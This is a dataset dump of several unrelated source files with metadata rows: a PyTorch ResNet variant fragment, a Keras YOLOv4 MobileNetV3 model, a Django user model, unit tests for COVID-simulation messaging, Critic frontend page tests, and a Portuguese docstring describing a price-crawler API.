i]): # Recalling "MResNet(BasicBlock,[3,3,3],**kwargs)", and "layers" is assigned as "[3,3,3]"; then j is 1 to 2
# if l == 0:
# self.l_last_res_planes = self.last_res_planes
# self.last_res_planes = self.in_planes
#
# elif l==1:
# self.l_last_res_planes = self.last_res_planes
# self.last_res_planes = self.in_planes
# else:
# self.l_last_res_planes = self.planes[i]*block.expansion
# self.last_res_planes = self.planes[i]*block.expansion
# self.plane = self.planes[i]*block.expansion
# print('j', j)
# print('v2: self.planes[i], self.in_planes, self.last_res_planes, self.l_last_res_planes', self.planes[i]* block.expansion, self.in_planes, self.last_res_planes, self.l_last_res_planes)
blocks.append(block(self.in_planes, self.planes[i], self.last_res_planes, self.l_last_res_planes,
k_ini=self.k_ini, stepsize=self.stepsize)) # three (Basic) Blocks
# self.l_last_res_planes = self.last_res_planes
# self.last_res_planes = self.in_planes
if l == 0 or l == 1:
self.l_last_res_planes = self.last_res_planes
self.last_res_planes = self.in_planes
else:
self.l_last_res_planes = self.planes[i] * block.expansion
self.last_res_planes = self.planes[i] * block.expansion
l += 1
# print('l', l)
else: # with death_rates
death_rates = [i / (n - 1) * (1 - PL) for i in range(n)] # n is the sum of elements of "[3,3,3]"
# print(death_rates)
for i in range(3):
blocks.append(
block(self.in_planes, self.planes[i], self.last_res_planes, self.l_last_res_planes, self.strides[i],
k_ini=self.k_ini, stepsize=self.stepsize,
death_rate=death_rates[i * layers[0]])) # note that layers[k] == layers[j]
self.l_last_res_planes = self.last_res_planes
self.last_res_planes = self.in_planes
self.in_planes = self.planes[i] * block.expansion
# print('i', i)
for j in range(1, layers[i]):
# print('j', j)
blocks.append(block(self.in_planes, self.planes[i], self.last_res_planes, self.l_last_res_planes,
k_ini=self.k_ini, stepsize=self.stepsize,
death_rate=death_rates[i * layers[0] + j]))
self.l_last_res_planes = self.last_res_planes
self.last_res_planes = self.in_planes
self.blocks = nn.ModuleList(blocks) # ModuleList cannot determine the sequence of layers
self.downsample1 = Downsample(16, 64, stride=1) # Downsample: (in_planes,out_planes,stride):
self.bn = nn.BatchNorm2d(64 * block.expansion)
self.avgpool = nn.AvgPool2d(8)
self.fc = nn.Linear(64 * block.expansion, num_classes)
for m in self.modules(): # initialization
if isinstance(m, nn.Conv2d): # if m is a conv
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels # element num of the kernel
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def change_state(self):
self.pretrain = not self.pretrain
def forward(self, x):
| 46.439909
| 207
| 0.55293
| 5,588
| 40,960
| 3.808518
| 0.046886
| 0.094399
| 0.103844
| 0.076685
| 0.882718
| 0.866131
| 0.84851
| 0.833991
| 0.819331
| 0.809181
| 0
| 0.048428
| 0.333032
| 40,960
| 882
| 208
| 46.439909
| 0.73059
| 0.215552
| 0
| 0.793269
| 0
| 0
| 0.00364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.017628
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c5910582bc688be2b74caac99851984e2f67fa15
| 6,691
|
py
|
Python
|
yolo4/models/yolo4_mobilenetv3_large.py
|
rootadminWalker/keras-YOLOv3-model-set
|
196ec711975e1821a260a9f6523008bf47ff8c84
|
[
"MIT"
] | null | null | null |
yolo4/models/yolo4_mobilenetv3_large.py
|
rootadminWalker/keras-YOLOv3-model-set
|
196ec711975e1821a260a9f6523008bf47ff8c84
|
[
"MIT"
] | null | null | null |
yolo4/models/yolo4_mobilenetv3_large.py
|
rootadminWalker/keras-YOLOv3-model-set
|
196ec711975e1821a260a9f6523008bf47ff8c84
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""YOLO_v4 MobileNetV3Large Model Defined in Keras."""
from tensorflow.keras.layers import ZeroPadding2D, UpSampling2D, Concatenate
from tensorflow.keras.models import Model
from ...common.backbones.mobilenet_v3 import MobileNetV3Large
#from yolo4.models.layers import compose, DarknetConv2D, DarknetConv2D_BN_Leaky, Spp_Conv2D_BN_Leaky, Depthwise_Separable_Conv2D_BN_Leaky, Darknet_Depthwise_Separable_Conv2D_BN_Leaky, make_yolo_head, make_yolo_spp_head, make_yolo_depthwise_separable_head, make_yolo_spp_depthwise_separable_head
from .layers import yolo4_predictions, yolo4lite_predictions, tiny_yolo4_predictions, tiny_yolo4lite_predictions
def yolo4_mobilenetv3large_body(inputs, num_anchors, num_classes, alpha=1.0):
"""Create YOLO_V4 MobileNetV3Large model CNN body in Keras."""
mobilenetv3large = MobileNetV3Large(input_tensor=inputs, weights='imagenet', include_top=False, alpha=alpha)
print('backbone layers number: {}'.format(len(mobilenetv3large.layers)))
# input: 416 x 416 x 3
# activation_38(layer 194, final feature map): 13 x 13 x (960*alpha)
# expanded_conv_14/Add(layer 191, end of block14): 13 x 13 x (160*alpha)
# activation_29(layer 146, middle in block12) : 26 x 26 x (672*alpha)
# expanded_conv_11/Add(layer 143, end of block11) : 26 x 26 x (112*alpha)
# activation_15(layer 79, middle in block6) : 52 x 52 x (240*alpha)
# expanded_conv_5/Add(layer 76, end of block5): 52 x 52 x (40*alpha)
# NOTE: activation layer name may different for TF1.x/2.x, so we
# use index to fetch layer
# f1: 13 x 13 x (960*alpha)
f1 = mobilenetv3large.layers[194].output
# f2: 26 x 26 x (672*alpha) for 416 input
f2 = mobilenetv3large.layers[146].output
# f3: 52 x 52 x (240*alpha) for 416 input
f3 = mobilenetv3large.layers[79].output
f1_channel_num = int(960*alpha)
f2_channel_num = int(672*alpha)
f3_channel_num = int(240*alpha)
#f1_channel_num = 1024
#f2_channel_num = 512
#f3_channel_num = 256
y1, y2, y3 = yolo4_predictions((f1, f2, f3), (f1_channel_num, f2_channel_num, f3_channel_num), num_anchors, num_classes)
return Model(inputs, [y1, y2, y3])
def yolo4lite_mobilenetv3large_body(inputs, num_anchors, num_classes, alpha=1.0):
'''Create YOLO_v4 Lite MobileNetV3Large model CNN body in keras.'''
mobilenetv3large = MobileNetV3Large(input_tensor=inputs, weights='imagenet', include_top=False, alpha=alpha)
print('backbone layers number: {}'.format(len(mobilenetv3large.layers)))
# input: 416 x 416 x 3
# activation_38(layer 194, final feature map): 13 x 13 x (960*alpha)
# expanded_conv_14/Add(layer 191, end of block14): 13 x 13 x (160*alpha)
# activation_29(layer 146, middle in block12) : 26 x 26 x (672*alpha)
# expanded_conv_11/Add(layer 143, end of block11) : 26 x 26 x (112*alpha)
# activation_15(layer 79, middle in block6) : 52 x 52 x (240*alpha)
# expanded_conv_5/Add(layer 76, end of block5): 52 x 52 x (40*alpha)
# NOTE: activation layer name may different for TF1.x/2.x, so we
# use index to fetch layer
# f1: 13 x 13 x (960*alpha)
f1 = mobilenetv3large.layers[194].output
# f2: 26 x 26 x (672*alpha) for 416 input
f2 = mobilenetv3large.layers[146].output
# f3: 52 x 52 x (240*alpha) for 416 input
f3 = mobilenetv3large.layers[79].output
f1_channel_num = int(960*alpha)
f2_channel_num = int(672*alpha)
f3_channel_num = int(240*alpha)
#f1_channel_num = 1024
#f2_channel_num = 512
#f3_channel_num = 256
y1, y2, y3 = yolo4lite_predictions((f1, f2, f3), (f1_channel_num, f2_channel_num, f3_channel_num), num_anchors, num_classes)
return Model(inputs, [y1, y2, y3])
def tiny_yolo4_mobilenetv3large_body(inputs, num_anchors, num_classes, alpha=1.0, use_spp=True):
'''Create Tiny YOLO_v4 MobileNetV3Large model CNN body in keras.'''
mobilenetv3large = MobileNetV3Large(input_tensor=inputs, weights='imagenet', include_top=False, alpha=alpha)
print('backbone layers number: {}'.format(len(mobilenetv3large.layers)))
# input: 416 x 416 x 3
# activation_38(layer 194, final feature map): 13 x 13 x (960*alpha)
# expanded_conv_14/Add(layer 191, end of block14): 13 x 13 x (160*alpha)
# activation_29(layer 146, middle in block12) : 26 x 26 x (672*alpha)
# expanded_conv_11/Add(layer 143, end of block11) : 26 x 26 x (112*alpha)
# activation_15(layer 79, middle in block6) : 52 x 52 x (240*alpha)
# expanded_conv_5/Add(layer 76, end of block5): 52 x 52 x (40*alpha)
# f1 :13 x 13 x (960*alpha)
# NOTE: activation layer name may different for TF1.x/2.x, so we
# use index to fetch layer
f1 = mobilenetv3large.layers[194].output
# f2: 26 x 26 x (672*alpha) for 416 input
f2 = mobilenetv3large.layers[146].output
f1_channel_num = int(960*alpha)
f2_channel_num = int(672*alpha)
#f1_channel_num = 1024
#f2_channel_num = 512
y1, y2 = tiny_yolo4_predictions((f1, f2), (f1_channel_num, f2_channel_num), num_anchors, num_classes, use_spp)
return Model(inputs, [y1,y2])
def tiny_yolo4lite_mobilenetv3large_body(inputs, num_anchors, num_classes, alpha=1.0, use_spp=True):
'''Create Tiny YOLO_v4 Lite MobileNetV3Large model CNN body in keras.'''
mobilenetv3large = MobileNetV3Large(input_tensor=inputs, weights='imagenet', include_top=False, alpha=alpha)
print('backbone layers number: {}'.format(len(mobilenetv3large.layers)))
# input: 416 x 416 x 3
# activation_38(layer 194, final feature map): 13 x 13 x (960*alpha)
# expanded_conv_14/Add(layer 191, end of block14): 13 x 13 x (160*alpha)
# activation_29(layer 146, middle in block12) : 26 x 26 x (672*alpha)
# expanded_conv_11/Add(layer 143, end of block11) : 26 x 26 x (112*alpha)
# activation_15(layer 79, middle in block6) : 52 x 52 x (240*alpha)
# expanded_conv_5/Add(layer 76, end of block5): 52 x 52 x (40*alpha)
# f1 :13 x 13 x (960*alpha)
# NOTE: activation layer name may different for TF1.x/2.x, so we
# use index to fetch layer
f1 = mobilenetv3large.layers[194].output
# f2: 26 x 26 x (672*alpha) for 416 input
f2 = mobilenetv3large.layers[146].output
f1_channel_num = int(960*alpha)
f2_channel_num = int(672*alpha)
#f1_channel_num = 1024
#f2_channel_num = 512
y1, y2 = tiny_yolo4lite_predictions((f1, f2), (f1_channel_num, f2_channel_num), num_anchors, num_classes, use_spp)
return Model(inputs, [y1,y2])
| 44.90604
| 295
| 0.697355
| 1,039
| 6,691
| 4.317613
| 0.127045
| 0.066875
| 0.013375
| 0.01605
| 0.879626
| 0.865805
| 0.865805
| 0.865805
| 0.865805
| 0.865805
| 0
| 0.124534
| 0.198326
| 6,691
| 148
| 296
| 45.209459
| 0.711782
| 0.487371
| 0
| 0.727273
| 0
| 0
| 0.04254
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.090909
| 0
| 0.272727
| 0.090909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c59f809fc81c3744048ad3ed5c1dc1596d170d33
| 248
|
py
|
Python
|
nsd1805/python/day20/mysite/market/models.py
|
MrWangwf/nsd1806
|
069e993b0bb64cb21adc2a25aa56f6da674453bc
|
[
"Apache-2.0"
] | null | null | null |
nsd1805/python/day20/mysite/market/models.py
|
MrWangwf/nsd1806
|
069e993b0bb64cb21adc2a25aa56f6da674453bc
|
[
"Apache-2.0"
] | null | null | null |
nsd1805/python/day20/mysite/market/models.py
|
MrWangwf/nsd1806
|
069e993b0bb64cb21adc2a25aa56f6da674453bc
|
[
"Apache-2.0"
] | null | null | null |
from django.db import models
class Userdb(models.Model):
username = models.CharField(max_length=20)
salt = models.CharField(max_length=8)
password = models.CharField(max_length=100)
def __str__(self):
return self.username
| 24.8
| 47
| 0.721774
| 33
| 248
| 5.212121
| 0.636364
| 0.261628
| 0.313953
| 0.418605
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.029557
| 0.181452
| 248
| 9
| 48
| 27.555556
| 0.817734
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0.142857
| 0.142857
| 0.142857
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 7
|
c5b138c547fa952cae37fcd4f70a3d91d9e874e6
| 10,825
|
py
|
Python
|
tests/test_should_send_message_gaen.py
|
mila-iqia/COVI-AgentSim
|
7e4dea42ad9c5dd251aa8d7546c647ad4f173d28
|
[
"Apache-2.0"
] | 13
|
2020-10-25T20:15:25.000Z
|
2022-03-14T06:34:32.000Z
|
tests/test_should_send_message_gaen.py
|
mila-iqia/COVI-AgentSim
|
7e4dea42ad9c5dd251aa8d7546c647ad4f173d28
|
[
"Apache-2.0"
] | 6
|
2020-10-30T02:09:48.000Z
|
2022-03-09T12:48:22.000Z
|
tests/test_should_send_message_gaen.py
|
mila-iqia/COVI-AgentSim
|
7e4dea42ad9c5dd251aa8d7546c647ad4f173d28
|
[
"Apache-2.0"
] | 6
|
2020-10-29T15:36:40.000Z
|
2021-12-05T18:06:45.000Z
|
import datetime
import numpy as np
import unittest
from covid19sim.locations.city import City
class DummyContactBook(object):
pass
class DummyHuman(object):
pass
class DummyCity(object):
pass
class ShouldSendMessageGaenTests(unittest.TestCase):
def test_intervention_day(self):
"""
check returns false if not far enough from intervention day
"""
cur_day = 10
daily_update_message_budget_sent_gaen = 0
current_timestamp = datetime.datetime.now()
risk_change = 2
city = DummyCity()
city.conf = dict(
BURN_IN_DAYS=2,
DAYS_BETWEEN_MESSAGES=2,
INTERVENTION_DAY=10,
UPDATES_PER_DAY=4,
MESSAGE_BUDGET_GAEN=1,
n_people=1000,
)
city.rng = np.random.RandomState(0)
city.risk_change_hist = {0: 12, 1: 1}
city.risk_change_histogram_sum = sum(city.risk_change_hist.values())
city.sent_messages_by_day = {cur_day: daily_update_message_budget_sent_gaen}
human = DummyHuman()
human.contact_book = DummyContactBook()
human.contact_book.latest_update_time = current_timestamp - datetime.timedelta(days=cur_day)
res = City._check_should_send_message_gaen(
city,
current_day_idx=cur_day,
current_timestamp=current_timestamp,
human=human,
risk_change_score=risk_change,
)
self.assertFalse(res)
city.conf["INTERVENTION_DAY"] = 9
res = City._check_should_send_message_gaen(
city,
current_day_idx=cur_day,
current_timestamp=current_timestamp,
human=human,
risk_change_score=risk_change,
)
self.assertFalse(res)
def test_last_update(self):
"""
check returns false if last update is too recent
"""
cur_day = 10
daily_update_message_budget_sent_gaen = 0
current_timestamp = datetime.datetime.now()
risk_change = 2
city = DummyCity()
city.conf = dict(
BURN_IN_DAYS=2,
DAYS_BETWEEN_MESSAGES=2,
INTERVENTION_DAY=5,
UPDATES_PER_DAY=4,
MESSAGE_BUDGET_GAEN=1,
n_people=1000,
)
city.rng = np.random.RandomState(0)
city.risk_change_histogram = {0: 12, 1: 1}
city.risk_change_histogram_sum = sum(city.risk_change_histogram.values())
city.sent_messages_by_day = {cur_day: daily_update_message_budget_sent_gaen}
human = DummyHuman()
human.contact_book = DummyContactBook()
human.contact_book.latest_update_time = current_timestamp
res = City._check_should_send_message_gaen(
city,
current_day_idx=cur_day,
current_timestamp=current_timestamp,
human=human,
risk_change_score=risk_change,
)
self.assertFalse(res)
def test_should_send_risk_change_true_det(self):
"""
check returns True if in last bucket, which is smaller than total message budget
"""
cur_day = 10
daily_update_message_budget_sent_gaen = 0
current_timestamp = datetime.datetime.now()
risk_change = 1
city = DummyCity()
city.conf = dict(
BURN_IN_DAYS=2,
DAYS_BETWEEN_MESSAGES=2,
INTERVENTION_DAY=5,
UPDATES_PER_DAY=4,
MESSAGE_BUDGET_GAEN=1,
n_people=1000,
)
city.rng = np.random.RandomState(0)
city.risk_change_histogram = {0: 1000, 1: 1}
city.risk_change_histogram_sum = sum(city.risk_change_histogram.values())
city.sent_messages_by_day = {cur_day: daily_update_message_budget_sent_gaen}
human = DummyHuman()
human.contact_book = DummyContactBook()
human.contact_book.latest_update_time = current_timestamp - datetime.timedelta(days=cur_day)
res = City._check_should_send_message_gaen(
city,
current_day_idx=cur_day,
current_timestamp=current_timestamp,
human=human,
risk_change_score=risk_change,
)
self.assertTrue(res)
def test_last_bucket_prob(self):
"""
check if you're in the last bucket but it's larger than message budget, total messages = budget for this update (=> /UPDATES_PER_DAY)
"""
cur_day = 10
daily_update_message_budget_sent_gaen = 0
current_timestamp = datetime.datetime.now()
risk_change = 1 # risk_change HAS to be in risk_change_histogram
city = DummyCity()
city.conf = dict(
BURN_IN_DAYS=2,
DAYS_BETWEEN_MESSAGES=1,
INTERVENTION_DAY=5,
UPDATES_PER_DAY=4,
MESSAGE_BUDGET_GAEN=1,
n_people=1000,
)
city.rng = np.random.RandomState(0)
city.risk_change_histogram = {0: 60, 1: 40}
city.risk_change_histogram_sum = sum(city.risk_change_histogram.values())
city.sent_messages_by_day = {cur_day: daily_update_message_budget_sent_gaen}
human = DummyHuman()
human.contact_book = DummyContactBook()
human.contact_book.latest_update_time = current_timestamp - datetime.timedelta(days=cur_day)
results = []
for i in range(1000):
res = City._check_should_send_message_gaen(
city,
current_day_idx=cur_day,
current_timestamp=current_timestamp,
human=human,
risk_change_score=risk_change,
)
results.append(res)
if res:
if cur_day not in city.sent_messages_by_day:
city.sent_messages_by_day[cur_day] = 0
city.sent_messages_by_day[cur_day] += 1
self.assertAlmostEqual(1 / 4, np.mean(results), 2)
def test_middle_bucket_prob(self):
"""
checks that if in previous to last bucket and last bucket is smaller than
budget, then messages sent correspond to the number of remaining messages
"""
cur_day = 10
daily_update_message_budget_sent_gaen = 0
current_timestamp = datetime.datetime.now()
risk_change = 1 # risk_change HAS to be in risk_change_histogram
city = DummyCity()
city.conf = dict(
BURN_IN_DAYS=2,
DAYS_BETWEEN_MESSAGES=1,
INTERVENTION_DAY=5,
UPDATES_PER_DAY=4,
MESSAGE_BUDGET_GAEN=1,
n_people=1000,
)
city.rng = np.random.RandomState(0)
city.risk_change_histogram = {0: 50, 1: 40, 2: 10}
city.risk_change_histogram_sum = sum(city.risk_change_histogram.values())
city.sent_messages_by_day = {cur_day: daily_update_message_budget_sent_gaen}
human = DummyHuman()
human.contact_book = DummyContactBook()
human.contact_book.latest_update_time = current_timestamp - datetime.timedelta(days=cur_day)
results = []
for i in range(1000):
res = City._check_should_send_message_gaen(
city,
current_day_idx=cur_day,
current_timestamp=current_timestamp,
human=human,
risk_change_score=risk_change,
)
results.append(res)
if res:
if cur_day not in city.sent_messages_by_day:
city.sent_messages_by_day[cur_day] = 0
city.sent_messages_by_day[cur_day] += 1
# allowed messages: 100 / 4 = 25
# already sent messages: 10
# remaining to send for second bucket: 15
self.assertAlmostEqual(1 / 4 - 10 / 100, np.mean(results), 2)
def test_middle_bucket_last_is_full(self):
"""
If the last bucket is larger than the budget then no message is sent when in the second largest bucket
"""
cur_day = 10
daily_update_message_budget_sent_gaen = 0
current_timestamp = datetime.datetime.now()
risk_change = 1 # risk_change HAS to be in risk_change_histogram
city = DummyCity()
city.conf = dict(
BURN_IN_DAYS=2,
DAYS_BETWEEN_MESSAGES=1,
INTERVENTION_DAY=5,
UPDATES_PER_DAY=4,
MESSAGE_BUDGET_GAEN=1,
n_people=1000,
)
city.rng = np.random.RandomState(0)
city.risk_change_histogram = {0: 40, 1: 20, 2: 40}
city.risk_change_histogram_sum = sum(city.risk_change_histogram.values())
city.sent_messages_by_day = {cur_day: daily_update_message_budget_sent_gaen}
human = DummyHuman()
human.contact_book = DummyContactBook()
human.contact_book.latest_update_time = current_timestamp - datetime.timedelta(days=cur_day)
res = City._check_should_send_message_gaen(
city,
current_day_idx=cur_day,
current_timestamp=current_timestamp,
human=human,
risk_change_score=risk_change,
)
self.assertFalse(res)
def test_last_bucket_low_budget(self):
"""
Everything works still with a very low budget
"""
cur_day = 10
daily_update_message_budget_sent_gaen = 0
current_timestamp = datetime.datetime.now()
risk_change = 2 # risk_change HAS to be in risk_change_histogram
city = DummyCity()
city.conf = dict(
BURN_IN_DAYS=2,
DAYS_BETWEEN_MESSAGES=2,
INTERVENTION_DAY=5,
UPDATES_PER_DAY=4,
MESSAGE_BUDGET_GAEN=0.01,
n_people=1000,
)
city.rng = np.random.RandomState(0)
city.risk_change_histogram = {0: 40, 1: 20, 2: 40}
city.risk_change_histogram_sum = sum(city.risk_change_histogram.values())
city.sent_messages_by_day = {cur_day: daily_update_message_budget_sent_gaen}
human = DummyHuman()
human.contact_book = DummyContactBook()
human.contact_book.latest_update_time = current_timestamp - datetime.timedelta(days=cur_day)
results = []
for i in range(1000):
res = City._check_should_send_message_gaen(
city,
current_day_idx=cur_day,
current_timestamp=current_timestamp,
human=human,
risk_change_score=risk_change,
)
results.append(res)
if res:
if cur_day not in city.sent_messages_by_day:
city.sent_messages_by_day[cur_day] = 0
city.sent_messages_by_day[cur_day] += 1
self.assertAlmostEqual(city.conf["MESSAGE_BUDGET_GAEN"] / 4, np.mean(results), 2)
| 35.963455
| 141
| 0.617367
| 1,307
| 10,825
| 4.76052
| 0.110941
| 0.085182
| 0.070235
| 0.070235
| 0.848441
| 0.834298
| 0.834298
| 0.834298
| 0.82369
| 0.82369
| 0
| 0.026056
| 0.308637
| 10,825
| 300
| 142
| 36.083333
| 0.805318
| 0.083695
| 0
| 0.819672
| 0
| 0
| 0.003592
| 0
| 0
| 0
| 0
| 0
| 0.032787
| 1
| 0.028689
| false
| 0.012295
| 0.016393
| 0
| 0.061475
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c5de9b719b25ff84ca2c5de324a90154fcdb6ab5
| 1,499
|
py
|
Python
|
testing/tests/001-main/004-extensions/002-tests/001-tutorial.py
|
fekblom/critic
|
a6b60c9053e13d4c878d50531860d7389568626d
|
[
"Apache-2.0"
] | 216
|
2015-01-05T12:48:10.000Z
|
2022-03-08T00:12:23.000Z
|
testing/tests/001-main/004-extensions/002-tests/001-tutorial.py
|
fekblom/critic
|
a6b60c9053e13d4c878d50531860d7389568626d
|
[
"Apache-2.0"
] | 55
|
2015-02-28T12:10:26.000Z
|
2020-11-18T17:45:16.000Z
|
testing/tests/001-main/004-extensions/002-tests/001-tutorial.py
|
fekblom/critic
|
a6b60c9053e13d4c878d50531860d7389568626d
|
[
"Apache-2.0"
] | 34
|
2015-05-02T15:15:10.000Z
|
2020-06-15T19:20:37.000Z
|
frontend.page("tutorial",
expect={ "document_title": testing.expect.document_title(u"Tutorials"),
"content_title": testing.expect.paleyellow_title(0, u"Tutorials"),
"pageheader_links": testing.expect.pageheader_links("anonymous",
"extensions"),
"script_user": testing.expect.script_no_user() })
frontend.page("tutorial",
params={ "item": "extensions" },
expect={ "document_title": testing.expect.document_title(u"Critic Extensions"),
"content_title": testing.expect.paleyellow_title(0, u"Critic Extensions"),
"pageheader_links": testing.expect.pageheader_links("anonymous",
"extensions"),
"script_user": testing.expect.script_no_user() })
frontend.page("tutorial",
params={ "item": "extensions-api" },
expect={ "document_title": testing.expect.document_title(u"Critic Extensions API"),
"content_title": testing.expect.paleyellow_title(0, u"Critic Extensions API"),
"pageheader_links": testing.expect.pageheader_links("anonymous",
"extensions"),
"script_user": testing.expect.script_no_user() })
| 65.173913
| 101
| 0.515677
| 121
| 1,499
| 6.165289
| 0.190083
| 0.209115
| 0.152815
| 0.104558
| 0.936997
| 0.936997
| 0.936997
| 0.936997
| 0.819035
| 0.819035
| 0
| 0.003185
| 0.371581
| 1,499
| 22
| 102
| 68.136364
| 0.788747
| 0
| 0
| 0.6
| 0
| 0
| 0.246164
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
68071176a175e2c6603c56d48bbf2bc4e29e1ba9
| 4,913
|
py
|
Python
|
docstring.py
|
LeonardoGazziro/crawler_precos
|
38c40bbbe1f9b2fa4b0cdecbbc9114762f4fa462
|
[
"MIT"
] | null | null | null |
docstring.py
|
LeonardoGazziro/crawler_precos
|
38c40bbbe1f9b2fa4b0cdecbbc9114762f4fa462
|
[
"MIT"
] | null | null | null |
docstring.py
|
LeonardoGazziro/crawler_precos
|
38c40bbbe1f9b2fa4b0cdecbbc9114762f4fa462
|
[
"MIT"
] | null | null | null |
DOC_STRING = {
"DADOS SOBRE A API": {
"ENDPOINTS": ["inserir_produto", "listar_produtos", "alterar_preco_aviso",
"ver_info_produto", "ver_ultimos_precos", "ver_ultimo_preco_prod"],
"DESCRICAO DOS ENDPOINTS": {
"INSERIR PRODUTO": {
"endpoint": "/inserir_produto",
"metodo": "POST",
"payload": "JSON",
"descricao": "Insere um novo produto para pesquisa no Crawler",
"exemplo": ""
},
"LISTAR PRODUTOS": {
"endpoint": "/listar_produtos",
"metodo": "GET",
"descricao": "Retorna a lista de produtos que estão sendo pesquisados pelo crawler."
},
"ALTERAR PRECO AVISO": {
"endpoint": "/alterar_preco_aviso",
"metodo": "POST",
"payload": "JSON",
"descricao": "altera o valor de aviso de um produto",
"exemplo": ""
},
"VER INFO PRODUTO": {
"endpoint": "/ver_info_produto/{id_produto}",
"metodo": "GET",
"descricao": "retorna as informações de um produto, limite, nome e lista de links que estão sendo crawleadas"
},
"VER ULTIMOS PRECOS": {
"endpoint": "/ver_ultimos_precos",
"metodo": "GET",
"descricao": "Retorna o JSON com os ultimos preços crawleados"
},
"VER ULTIMO PRECO DO PRODUTO": {
"endpoint": "/ver_ultimo_preco_prod/{id_produto}",
"metodo": "GET",
"descricao": "retorna o ultimo preço de um produto utilizando o id do produto"
}
},
"TEXT": "Conteudo destinado ao estudo de Python e utilização de micro serviços na nuvem da AWS.",
"CREATED BY": "Leonardo Roberto Gazziro",
"LINKEDIN": "www.linkedin.com/in/leonardo-roberto-gazziro",
"GITHUB": "https://github.com/LeonardoGazziro"
}
}
"""
DADOS SOBRE A API
====================================================================================================================
ENDPOINTS:
inserir_produto | listar_produtos | alterar_preco_aviso
ver_info_produto | ver_ultimos_precos | ver_ultimo_preco_prod
DESCRICAO DOS ENDPOINTS:
################################################################################################################
INSERIR PRODUTO:
endpoint: /inserir_produto
metodo: POST
payload: JSON
descricao: Insere um novo produto para pesquisa no Crawler
exemplo:
{
"product": "NOME DO PRODUTO",
"wanted_price": valor do produto (INTEIRO),
"links": [
"link americanas",
"link submarino"
]
}
LISTAR PRODUTOS:
endpoint: /listar_produtos
metodo: GET
descricao: Retorna a lista de produtos que estão sendo pesquisados pelo crawler.
ALTERAR PRECO AVISO:
endpoint: /alterar_preco_produto
metodo: POST
payload: JSON
descricao: altera o valor de aviso de um produto
exemplo:
{
"product_id" ID_DO_PRODUTO,
"new_warning_price": NOVO VALOR DE AVISO (INTEIRO)
}
VER INFO PRODUTO:
endpoint: /ver_info_produto/{id_produto}
metodo: GET
payload: -
descricao: retorna as informações de um produto, limite, nome e lista de links que estão sendo crawleadas
VER ULTIMOS PRECOS:
endpoint: /ver_ultimos_precos
metodo: GET
payload: -
descricao: Retorna o JSON com os ultimos preços crawleados
VER ULTIMO PRECO DO PRODUTO:
endpoint: /ver_ultimo_preco_prod/{id_produto}
metodo: GET
payload: -
descricao: retorna o ultimo preço de um produto utilizando o id do produto
====================================================================================================================
Conteudo destinado ao estudo de Python e utilização de micro serviços na nuvem da AWS.
####################################################################################################################
*** Created by: Leonardo Roberto Gazziro ***
*** LinkedIn: www.linkedin.com/in/leonardo-roberto-gazziro ***
*** GitHub: https://github.com/LeonardoGazziro ***
####################################################################################################################
"""
| 43.096491
| 125
| 0.46265
| 414
| 4,913
| 5.357488
| 0.229469
| 0.032462
| 0.037872
| 0.056357
| 0.927863
| 0.927863
| 0.921551
| 0.915239
| 0.915239
| 0.915239
| 0
| 0
| 0.343578
| 4,913
| 114
| 126
| 43.096491
| 0.687752
| 0
| 0
| 0.217391
| 0
| 0
| 0.563557
| 0.062832
| 0
| 0
| 0
| 0.052632
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a876708ec0716560c97c3cd4551ee63f97211c20
| 68,613
|
py
|
Python
|
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_rr/cmp_libquantum/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_rr/cmp_libquantum/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
